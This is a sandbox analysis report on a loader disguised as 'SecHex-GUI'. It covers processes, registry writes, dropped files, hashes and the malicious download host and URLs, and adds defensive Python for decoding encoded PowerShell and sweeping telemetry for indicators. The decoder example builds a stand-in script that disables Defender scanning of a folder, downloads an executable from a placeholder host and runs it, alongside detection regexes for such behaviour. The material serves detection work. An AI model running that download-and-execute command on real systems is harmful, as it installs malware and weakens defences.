File name: SecHex-GUI.exe
Full analysis: https://app.any.run/tasks/b706d06e-139b-4611-88d6-af42b42f1686
Verdict: Malicious activity
Threats: loader

A loader is malware whose job is to get a further payload onto the machine: it profiles the infected system, then fetches and installs other threats such as trojans or stealers. Loaders usually reach victims through phishing e-mails and links, relying on social engineering to get the user to download and run the executable, and they use evasion and persistence techniques to stay undetected.

Analysis date: July 18, 2024, 18:38:01
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: susp-powershell, loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: 22DA7C7190FB8A49C42E452237C69237
SHA1: 8423A794CFFDB91D923E84A755E93F891C14AA63
SHA256: 6A8E11EAED482324160A1A391FFA7F2A5D126ABE3CD4B724B8F8141B3B9D8AF8
SSDEEP: 98304:lRMtUeCgLNe9sLt7LEPzkouw5/DBhoYWUtN01kOnNmrDcvevM5YE+gVu7xVBUaZp:vi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • SecHex-GUI.exe (PID: 7044)
      • powershell.exe (PID: 2356)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • SecHex-GUI.exe (PID: 7044)
    • Reads security settings of Internet Explorer

      • SecHex-GUI.exe (PID: 7044)
    • BASE64 encoded PowerShell command has been detected

      • SecHex-GUI.exe (PID: 7044)
    • Starts POWERSHELL.EXE for commands execution

      • SecHex-GUI.exe (PID: 7044)
    • Base64-obfuscated command line is found

      • SecHex-GUI.exe (PID: 7044)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2356)
  • INFO

    • Checks supported languages

      • SecHex-GUI.exe (PID: 7044)
    • Reads the computer name

      • SecHex-GUI.exe (PID: 7044)
    • Process checks computer location settings

      • SecHex-GUI.exe (PID: 7044)
    • Disables trace logs

      • powershell.exe (PID: 2356)
    • Checks proxy server information

      • powershell.exe (PID: 2356)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2356)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 2356)
No Malware configuration.

TRiD (heuristic file-type guesses; the PE header in the EXIF block below is authoritative and says PE32, Intel 386, so the "Win64" top guess is a weak generic match)

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.3)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF (EXE)

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 1024
InitializedDataSize: 7680
UninitializedDataSize: -
EntryPoint: 0x9bc40c
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.6.0.0
ProductVersionNumber: 1.6.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Unknown (0)
ObjectFileType: Unknown
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: SecHex-GUI
FileTitle: SecHex-GUI.dll
FileDescription: SecHex-GUI
FileVersion: 1,6,0,0
LegalCopyright: -
LegalTrademark: -
ProductName: SecHex-GUI
ProductVersion: 1,6,0,0

Note: the compile timestamp is zeroed and the entry point (RVA 0x9bc40c) lies far outside the 1 KB of code the header declares, which is typical of a packed or post-processed image, so these header fields should not be relied on for attribution. The version resource names the product SecHex-GUI.dll although the file on disk is SecHex-GUI.exe; the SecHex-GUI.dll, .pdb and .runtimeconfig.json later fetched into %TEMP% (see Dropped files) are the usual layout of a .NET application whose .exe is only a host for the managed assembly.
Total processes: 123
Monitored processes: 4
Malicious processes: 1
Suspicious processes: 1


Behavior graph

start -> sechex-gui.exe (THREAT) -> powershell.exe -> conhost.exe (no specs)
start -> sechex-gui.exe (no specs)

Process information

PID 2356: powershell.exe (parent: SecHex-GUI.exe, PID 7044)
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  User: admin; Company: Microsoft Corporation; Integrity level: HIGH
  Description: Windows PowerShell; Version: 10.0.19041.1 (WinBuild.160101.0800)
  Loaded images (as listed in the report):
    c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    c:\windows\system32\ntdll.dll
    c:\windows\syswow64\ntdll.dll
    c:\windows\system32\wow64.dll
    c:\windows\system32\wow64win.dll
    c:\windows\system32\wow64cpu.dll
    c:\windows\syswow64\kernel32.dll
    c:\windows\syswow64\kernelbase.dll
    c:\windows\syswow64\apphelp.dll
    c:\windows\syswow64\msvcrt.dll
  Note: the command line names System32, but the image that actually ran is the SysWOW64 copy. The parent is a 32-bit process, so file-system redirection handed it the 32-bit PowerShell host (hence the wow64*.dll modules here and the WOW6432Node registry writes below). A detection that keys on the System32 path will match the command line but not the image path; check both.

PID 4928: conhost.exe (parent: powershell.exe, PID 2356)
  CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
  Path: C:\Windows\System32\conhost.exe
  User: admin; Company: Microsoft Corporation; Integrity level: HIGH
  Description: Console Window Host; Version: 10.0.19041.1 (WinBuild.160101.0800)
  Loaded images (as listed in the report):
    c:\windows\system32\conhost.exe
    c:\windows\system32\ntdll.dll
    c:\windows\system32\kernel32.dll
    c:\windows\system32\kernelbase.dll
    c:\windows\system32\msvcp_win.dll
    c:\windows\system32\ucrtbase.dll
    c:\windows\system32\shcore.dll
    c:\windows\system32\msvcrt.dll
    c:\windows\system32\combase.dll
    c:\windows\system32\rpcrt4.dll
  Note: conhost.exe is the console host Windows starts for every console process; it is listed for completeness and is not itself suspicious.

PID 7044: SecHex-GUI.exe (parent: explorer.exe)
  CMD: "C:\Users\admin\Desktop\SecHex-GUI.exe"
  Path: C:\Users\admin\Desktop\SecHex-GUI.exe
  User: admin; Company: SecHex-GUI; Integrity level: HIGH
  Description: SecHex-GUI; Exit code: 0; Version: 1,6,0,0
  Loaded images (as listed in the report):
    c:\users\admin\desktop\sechex-gui.exe
    c:\windows\system32\ntdll.dll
    c:\windows\syswow64\ntdll.dll
    c:\windows\system32\wow64.dll
    c:\windows\system32\wow64win.dll
    c:\windows\system32\wow64cpu.dll
    c:\windows\syswow64\kernel32.dll
    c:\windows\syswow64\kernelbase.dll
    c:\windows\syswow64\apphelp.dll
    c:\windows\syswow64\user32.dll

PID 7972: SecHex-GUI.exe (parent: explorer.exe)
  CMD: "C:\Users\admin\Desktop\SecHex-GUI.exe"
  Path: C:\Users\admin\Desktop\SecHex-GUI.exe
  User: admin; Company: SecHex-GUI; Integrity level: MEDIUM
  Description: SecHex-GUI; Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED); Version: 1,6,0,0
  Loaded images (as listed in the report):
    c:\users\admin\desktop\sechex-gui.exe
    c:\windows\system32\ntdll.dll
    c:\windows\syswow64\ntdll.dll
  Note: this medium-integrity launch never got past the loader (only ntdll is mapped) because the executable requests elevation. The run that did the work is PID 7044 at HIGH integrity, so the sample and its PowerShell child executed with administrative rights; the HKLM writes below and any change to Windows Defender settings (see the YARA hit in the signature list) require exactly that.
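The encoded command passed to PID 2356 is redacted in this report, so the following is an added example, not code from ANY.RUN or from the sample's authors. It shows what an analyst or a detection rule does with such a line: recognise every spelling of the -EncodedCommand switch, decode the base64/UTF-16LE blob, and score the decoded script for the behaviours the signatures above flag (Defender access, downloading, executing from AppData) rather than alerting on "encoded PowerShell" alone, which legitimate tooling also produces. The process records, the stand-in script and the host name loader.example are constructed; the indicator regexes are assumptions to tune for your environment.

```python
"""Decode PowerShell -EncodedCommand arguments from process command lines and
tag the decoded script for loader-style behaviour.  Added example; the sample
command lines below are constructed, not taken from the report."""
import base64
import binascii
import re
import shlex
from typing import Optional

# PowerShell accepts any non-empty prefix of "encodedcommand" (-e, -en, -enc, ...)
# and the explicit -ec alias for this switch.
_FULL = "encodedcommand"

# Assumed indicator patterns for the decoded script; tune them to your environment.
SCRIPT_INDICATORS = {
    "defender-tamper": re.compile(r"(?:Add|Set)-MpPreference|DisableRealtimeMonitoring", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|"
                           r"Net\.WebClient|Start-BitsTransfer", re.I),
    "execute-from-appdata": re.compile(r"Start-Process[^;]*(?:\$env:APPDATA|AppData\\Roaming)", re.I),
    "inline-eval": re.compile(r"Invoke-Expression|\biex\b|FromBase64String", re.I),
}
# Indicators visible on the command line itself, outside the encoded blob.
CMDLINE_INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def _is_encoded_switch(token: str) -> bool:
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return name == "ec" or (name != "" and _FULL.startswith(name))


def extract_encoded_command(cmd: str) -> Optional[str]:
    """Return the argument that follows an -EncodedCommand style switch, or None."""
    try:
        tokens = shlex.split(cmd, posix=False)  # non-POSIX: Windows backslashes stay literal
    except ValueError:
        return None
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str) -> Optional[str]:
    """The switch carries base64 over UTF-16LE text; anything else is rejected."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(event: dict) -> dict:
    """Decode one process-creation record and list the behaviours it shows."""
    cmd = event["cmd"]
    b64 = extract_encoded_command(cmd)
    decoded = decode_encoded_command(b64) if b64 else None
    hits = {name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmd)}
    if decoded:
        hits |= {name for name, rx in SCRIPT_INDICATORS.items() if rx.search(decoded)}
    return {"pid": event["pid"], "parent": event["parent"],
            "decoded": decoded, "indicators": sorted(hits)}


def scan(events) -> list:
    return [analyze(e) for e in events]


def _enc(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the redacted payload: Defender exclusion, download to
# %APPDATA%, execute.  The host name is fictitious.
SAMPLE_SCRIPT = (r'Add-MpPreference -ExclusionPath $env:APPDATA; '
                 r'Invoke-WebRequest -Uri https://loader.example/remote/payload.exe '
                 r'-OutFile "$env:APPDATA\payload.exe"; Start-Process "$env:APPDATA\payload.exe"')

SAMPLE_EVENTS = [  # constructed process-creation records
    {"pid": 2356, "parent": "SecHex-GUI.exe",
     "cmd": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            '-EncodedCommand "' + _enc(SAMPLE_SCRIPT) + '"'},
    {"pid": 4100, "parent": "explorer.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + _enc("Get-Date")},
    {"pid": 5120, "parent": "cmd.exe",
     "cmd": 'powershell.exe -Command "Get-Process | Out-Null"'},
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["pid"], r["parent"], r["indicators"])
        if r["decoded"]:
            print("   ", r["decoded"])
```

On the first record the decoder recovers the script and reports defender-tamper, download and execute-from-appdata; the second decodes to a harmless Get-Date and is flagged only for its hidden window; the third has no encoded argument at all. Scoring on the decoded content is what separates the loader's command from the many benign encoded invocations a fleet produces.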
Total events: 7 883
Read events: 7 852
Write events: 31
Delete events: 0

Modification events

PID 7044 SecHex-GUI.exe, key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:
  write ProxyBypass = 1
  write IntranetName = 1
  write UNCAsIntranet = 1
  write AutoDetect = 0
PID 2356 powershell.exe, key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:
  write ProxyBypass = 1
  write IntranetName = 1
  write UNCAsIntranet = 1
  write AutoDetect = 0
PID 2356 powershell.exe, key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing:
  write EnableConsoleTracing = 0
PID 2356 powershell.exe, key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32:
  write EnableFileTracing = 0

Note: the ZoneMap values are what WinINet/urlmon write the first time a process initialises the Internet Explorer zone settings, and the RASAPI32 tracing keys (behind the "Disables trace logs" signature) are a similarly routine side effect of using the Windows networking APIs. They show that both the sample and its PowerShell child touched the network stack, not that either deliberately tampered with settings. None of the listed writes is a persistence location; the HKLM writes under WOW6432Node confirm a 32-bit process running elevated.
Executable files: 2
Suspicious files: 3
Text files: 4
Unknown types: 0

Dropped files (all written by PID 2356, powershell.exe)

C:\Users\admin\AppData\Local\Temp\SecHex-GUI.dll (executable)
  MD5: AD714EE48D2E829C5012C65DE6166C05
  SHA256: 7D32D13D123871650794A1E172ADC70BC8DAFBDB762F49D889F813844D532B20
C:\Users\admin\AppData\Local\Temp\SecHex-GUI.pdb (binary)
  MD5: D2F1182DA0077F1E60E33F1EFA03584A
  SHA256: 593169A5292387FF27C5C5DE33DB0FA1EAF65290FD52C6FF93D49233E7EBDEBC
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wlgqzehi.vp4.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bghvwyns.vp3.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ehplvdfh.sr0.ps1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache (binary)
  MD5: D5DD617E0584B6DADE2F25DC03E28545
  SHA256: 438ECB11A1DF3FBF2512B40590BB9E998A7CC152ED9C97D0E069C8BB21B13A59
C:\Users\admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe (executable)
  MD5: 280F228A0FD9232C72C66646F5AC8F27
  SHA256: 6AACE057C548DF95831B928AAB373130BC09F5636FB7FFF52372B4280F2FFE51
C:\Users\admin\AppData\Local\Temp\SecHex-GUI.runtimeconfig.json (binary)
  MD5: D720176A229E9D969B40FABEB0BAF62E
  SHA256: 321B4E463BBACD6113AA337511BDEBF5E7356E9971744346B28424607C7B483A
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ym2dhtl.ypc.ps1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Note: the four __PSScriptPolicyTest_* files share one hash because PowerShell itself writes them at start-up to probe AppLocker/WDAC script enforcement, and ModuleAnalysisCache is PowerShell's own module cache; neither is an indicator. The files worth acting on are the SecHex-GUI .NET pieces staged in %TEMP% (dll, pdb, runtimeconfig.json, matching the downloads below) and sphyperRuntimedhcpSvc.exe, the 2.31 Mb second-stage executable written to %APPDATA%.
HTTP(S) requests: 8
TCP/UDP connections: 24
DNS requests: 7
Threats: 4

HTTP requests

The report does not attribute these rows to a PID, and CN and reputation are "unknown" for every row. The Connections table below ties bookreading2024.net to PID 2356 (powershell.exe) and the iris/bing requests to backgroundTaskHost.exe, i.e. Windows background activity.

Method | Code | IP:port | URL | Type | Size
GET | 200 | 188.114.96.3:443 | https://bookreading2024.net/cl/sh/SecHex-GUI.runtimeconfig.json | binary | 266 b
GET | 200 | 20.199.58.43:443 | https://fd.api.iris.microsoft.com/v4/api/selection?&asid=AA58E93E83F94331A6473BB7D688A4A2&nct=1&placement=88000677&bcnt=30&country=US&locale=en-US&poptin=0&fmt=json&arch=AMD64&chassis=1&concp=0&d3dfl=D3D_FEATURE_LEVEL_12_1&devfam=Windows.Desktop&devosver=10.0.19045.4046&dinst=1661339444&dmret=0&flightbranch=&flightring=Retail&icluc=0&localid=w%3AAC7699B0-48EA-FD22-C8DC-06A02098A0F0&oem=DELL&osbranch=vb_release&oslocale=en-US&osret=1&ossku=Professional&osskuid=48&prccn=4&prccs=3094&prcmf=AuthenticAMD&procm=Intel%28R%29%20Core%28TM%29%20i5-6400%20CPU%20%40%202.70GHz&ram=4096&tinst=Client&tl=1&pat=0&smc=0&sac=0&disphorzres=1280&dispsize=15.3&dispvertres=720&ldisphorzres=1280&ldispvertres=720&moncnt=1&cpdsk=260281&frdsk=218542&lo=3609277&tsu=999807 | binary | 102 b
GET | 200 | 104.126.37.146:443 | https://www.bing.com/client/config?cc=US&setlang=en-US | binary | 2.15 Kb
GET | 200 | 188.114.97.3:443 | https://bookreading2024.net/cl/sh/SecHex-GUI.deps.json | binary | 55.9 Kb
GET | 200 | 188.114.96.3:443 | https://bookreading2024.net/cl/sh/SecHex-GUI.dll | executable | 1.34 Mb
GET | 200 | 188.114.97.3:443 | https://bookreading2024.net/cl/sh/SecHex-GUI.pdb | binary | 32.9 Kb
GET | 200 | 188.114.96.3:443 | https://bookreading2024.net/remote/sphyperRuntimedhcpSvc.exe | executable | 2.31 Mb
GET | 200 | 188.114.97.3:443 | https://bookreading2024.net/cl/sh/SecHex-GUI.exe | executable | 144 Kb

Note: everything the sample fetched came over TLS from one host. Under /cl/sh/ it pulled the full .NET publish set for SecHex-GUI (runtimeconfig.json, deps.json, dll, pdb and a 144 Kb exe), and under /remote/ a second executable, sphyperRuntimedhcpSvc.exe, which is the file that landed in %APPDATA%. The two URL prefixes and the file names are better hunting keys than the Cloudflare addresses.

Connections

PID | Process | IP:port | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 20.74.47.205:443 | arc.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | unknown
4716 | svchost.exe | 40.126.31.73:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
7856 | svchost.exe | 4.208.221.206:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
- | - | 239.255.255.250:1900 | - | - | - | whitelisted
- | - | 40.113.103.199:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1796 | backgroundTaskHost.exe | 20.199.58.43:443 | fd.api.iris.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | unknown
3444 | backgroundTaskHost.exe | 104.126.37.131:443 | www.bing.com | Akamai International B.V. | DE | unknown
2760 | svchost.exe | 40.113.103.199:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2356 | powershell.exe | 188.114.97.3:443 | bookreading2024.net | CLOUDFLARENET | NL | unknown

Note: every row except the last is the sandbox's own Windows background traffic (MSN, Live, Bing and WNS endpoints, SSDP and a NetBIOS broadcast). The sample's only network peer is bookreading2024.net, reached by PID 2356. Its addresses 188.114.96.3 and 188.114.97.3 are Cloudflare anycast edges shared with many unrelated sites, so block and hunt on the domain and URL paths rather than on the IPs.

DNS requests

Domain | Resolved IPs | Reputation
arc.msn.com | 20.74.47.205 | whitelisted
login.live.com | 40.126.31.73, 20.190.159.73, 40.126.31.71, 40.126.31.67, 20.190.159.2, 20.190.159.68, 20.190.159.64, 20.190.159.23 | whitelisted
google.com | 142.250.185.142 | whitelisted
fd.api.iris.microsoft.com | 20.199.58.43 | whitelisted
www.bing.com | 104.126.37.131, 104.126.37.146, 104.126.37.163, 104.126.37.144, 104.126.37.160, 104.126.37.153, 104.126.37.137, 104.126.37.161, 104.126.37.170 | whitelisted
bookreading2024.net | 188.114.97.3, 188.114.96.3 | unknown
client.wns.windows.com | 40.115.3.253 | whitelisted

Threats (Suricata alerts; the report does not attribute them to a PID)

Class | Message
Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

Note: two Emerging Threats rules, each firing twice, on the executable downloads from bookreading2024.net. Both inspect HTTP headers and bodies, which were visible here only because the sandbox intercepts TLS; on a network without HTTPS inspection neither rule will fire on this traffic, and the DNS query for bookreading2024.net or the TLS server name is the only network-side observable.
No debug info
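To turn the report into something a SOC can run, here is an added example (not part of the ANY.RUN report) that sweeps host telemetry for the indicators listed above. It encodes the triage decisions a practitioner makes when lifting IoCs out of a sandbox run: file hashes, the domain and the dropped-file paths are strong; the Cloudflare addresses are weak; PowerShell's own __PSScriptPolicyTest and ModuleAnalysisCache artefacts are excluded; and the SecHex-GUI.exe to powershell.exe parent/child pair from the behaviour graph is matched by name. The telemetry records and host names are constructed; the record schema (type, path, sha256, query, dst_ip, image, parent) is an assumption standing in for whatever your EDR or Sysmon pipeline emits.

```python
"""Sweep host telemetry for the indicators in this report.  Added example; the
telemetry records below are constructed, not taken from the sandbox run."""
import re
from collections import defaultdict

# Indicators copied from the report above (hashes lower-cased for comparison).
IOC_SHA256 = {
    "6a8e11eaed482324160a1a391ffa7f2a5d126abe3cd4b724b8f8141b3b9d8af8": "SecHex-GUI.exe (analysed sample)",
    "7d32d13d123871650794a1e172adc70bc8dafbdb762f49d889f813844d532b20": "SecHex-GUI.dll (dropped)",
    "6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51": "sphyperRuntimedhcpSvc.exe (dropped)",
}
IOC_DOMAINS = {"bookreading2024.net"}
# Resolved addresses are Cloudflare anycast shared with unrelated sites: low confidence alone.
IOC_IPS = {"188.114.96.3", "188.114.97.3"}
IOC_PATHS = [
    re.compile(r"\\AppData\\Roaming\\sphyperRuntimedhcpSvc\.exe$", re.I),
    re.compile(r"\\AppData\\Local\\Temp\\SecHex-GUI\.(?:dll|pdb|runtimeconfig\.json)$", re.I),
]
# Deliberately not indicators: __PSScriptPolicyTest_*.ps1/.psm1 and ModuleAnalysisCache
# are written by PowerShell itself on every host and would only add noise.

_RANK = {"low": 1, "medium": 2, "high": 3}


def match_event(ev: dict) -> list:
    """Return (confidence, reason) pairs for one telemetry record."""
    hits = []
    kind = ev.get("type")
    if kind == "file_create":
        digest = ev.get("sha256", "").lower()
        if digest in IOC_SHA256:
            hits.append(("high", "hash of " + IOC_SHA256[digest]))
        if any(rx.search(ev.get("path", "")) for rx in IOC_PATHS):
            hits.append(("medium", "dropped-file path " + ev["path"]))
    elif kind == "dns":
        if ev.get("query", "").lower().rstrip(".") in IOC_DOMAINS:
            hits.append(("high", "DNS lookup of " + ev["query"]))
    elif kind == "net":
        if ev.get("dst_ip") in IOC_IPS:
            hits.append(("low", "connection to shared CDN address " + ev["dst_ip"]))
    elif kind == "process":
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        # Parent/child pair from the behaviour graph; paths differ per host, so match names.
        if image.endswith("\\powershell.exe") and parent.endswith("\\sechex-gui.exe"):
            hits.append(("medium", "powershell.exe spawned by " + ev["parent"]))
    return hits


def sweep(events) -> dict:
    """Group findings per host: {host: (highest confidence, [reasons])}."""
    per_host = defaultdict(list)
    for ev in events:
        for conf, why in match_event(ev):
            per_host[ev["host"]].append((conf, why))
    result = {}
    for host, found in per_host.items():
        top = max((conf for conf, _ in found), key=_RANK.__getitem__)
        result[host] = (top, [why for _, why in found])
    return result


SAMPLE_EVENTS = [  # constructed telemetry
    {"host": "ws01", "type": "process",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\admin\Desktop\SecHex-GUI.exe"},
    {"host": "ws01", "type": "dns", "query": "bookreading2024.net"},
    {"host": "ws01", "type": "file_create",
     "path": r"C:\Users\admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe",
     "sha256": "6AACE057C548DF95831B928AAB373130BC09F5636FB7FFF52372B4280F2FFE51"},
    {"host": "ws01", "type": "file_create",  # PowerShell's own policy probe: must not match
     "path": r"C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_abcd1234.ps1",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"},
    {"host": "ws02", "type": "net", "dst_ip": "188.114.96.3", "dst_port": 443},
    {"host": "ws03", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for host, (conf, reasons) in sweep(SAMPLE_EVENTS).items():
        print(host, conf)
        for why in reasons:
            print("   ", why)
```

ws01 comes back high with four reasons (the parent/child pair, the DNS lookup, and both the hash and the path of the dropped executable) while its __PSScriptPolicyTest file is correctly ignored; ws02, which only talked to a Cloudflare edge, is low and needs a domain or URL before anyone is paged; ws03, a normal explorer-launched PowerShell, produces nothing.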